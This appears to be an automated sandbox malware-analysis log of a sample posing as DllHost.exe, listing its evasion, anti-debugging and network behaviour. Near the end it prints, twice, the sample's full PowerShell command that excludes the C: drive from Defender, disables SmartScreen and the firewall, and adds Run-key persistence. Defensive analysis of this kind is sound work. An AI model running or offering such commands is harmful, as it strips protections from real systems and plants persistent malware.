Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\ProgramData\Systemd\procexp.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\Desktop\DllHost.exe TID: 2236Thread sleep time: -7200000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6384Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7060Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1860Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5792Thread sleep count: 7231 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568Thread sleep count: 373 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4936Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4936Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6364Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\DllHost.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6223Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2522Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7231
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 373
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2015
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4260
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2555
Source: C:\ProgramData\UpSys.exeAPI coverage: 5.7 %
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Users\user\Desktop\DllHost.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\UpSys.exeAPI call chain: ExitProcess graph end nodegraph_44-53084
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: svchost.exe, 00000016.00000002.671478152.0000023825061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
Source: DllHost.exe, 00000000.00000002.426727400.00000208C78FF000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000000.369797476.00000208C7878000.00000004.00000020.00020000.00000000.sdmp, procexp.exe, 00000004.00000002.315942522.000002747DEB8000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.350905224.0000023FB1F51000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000002.401017091.0000023FB1E8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.669899773.000002381F829000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.671386701.0000023825048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.784804016.000001EA77402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: procexp.exe, 00000004.00000002.315942522.000002747DEB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws\System32\en-US\wshqos.dll.mui
Source: System.exe, 0000000B.00000000.350905224.0000023FB1F51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: procexp.exe, 00000004.00000002.315942522.000002747DEB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: svchost.exe, 00000007.00000002.785015576.000001EA77428000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.785909189.0000016D7126C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.785525499.0000016588229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\DllHost.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140012EB0 GetVersionExW,GetCurrentProcess,GetSystemInfo,FreeLibrary,GetSystemInfo,44_2_0000000140012EB0
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191D092C FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_00007FF7191D092C
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191EDC14 FindFirstFileExW,0_2_00007FF7191EDC14
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C6092C FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,11_2_00007FF6E4C6092C
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C7DC14 FindFirstFileExW,11_2_00007FF6E4C7DC14
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014005A0D0 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,44_2_000000014005A0D0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140040EE0 GetFileAttributesW,FindFirstFileW,FindClose,44_2_0000000140040EE0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014004F070 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,44_2_000000014004F070
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140061180 FindFirstFileW,Sleep,FindNextFileW,FindClose,44_2_0000000140061180
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014006F660 FindFirstFileW,FindClose,44_2_000000014006F660
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014008A730 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,44_2_000000014008A730
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014003EAD0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,44_2_000000014003EAD0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140059E40 FindFirstFileW,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,44_2_0000000140059E40
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014006DF10 FindFirstFileW,FindNextFileW,FindClose,44_2_000000014006DF10
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140013BE0 LoadLibraryA,GetProcAddress,44_2_0000000140013BE0
Source: C:\Users\user\Desktop\DllHost.exeProcess queried: DebugPortJump to behavior
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191D2F58 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7191D2F58
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191EF270 GetProcessHeap,0_2_00007FF7191EF270
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\ProgramData\UpSys.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\ProgramData\UpSys.exeProcess token adjusted: Debug
Source: C:\ProgramData\UpSys.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\ProgramData\UpSys.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014006AAF0 BlockInput,44_2_000000014006AAF0
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191D2760 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,0_2_00007FF7191D2760
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191D2A08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7191D2A08
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191D3100 SetUnhandledExceptionFilter,0_2_00007FF7191D3100
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191D2F58 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7191D2F58
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191DA3C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7191DA3C4
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C62760 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,11_2_00007FF6E4C62760
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C6A3C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF6E4C6A3C4
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C62F58 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF6E4C62F58
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C63100 SetUnhandledExceptionFilter,11_2_00007FF6E4C63100
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C62A08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF6E4C62A08
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400290A4 SetUnhandledExceptionFilter,44_2_00000001400290A4
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002A2E0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_000000014002A2E0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014001E8EC RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_000000014001E8EC
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140028D30 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_0000000140028D30

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Users\user\Desktop\DllHost.exeDomain query: cdn.discordapp.com
Source: C:\Users\user\Desktop\DllHost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeDomain query: api.ipify.org
Source: C:\Users\user\Desktop\DllHost.exeDomain query: api.telegram.org
Source: C:\Users\user\Desktop\DllHost.exeNetwork Connect: 52.20.78.240 443Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeNetwork Connect: 162.159.134.233 443Jump to behavior
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
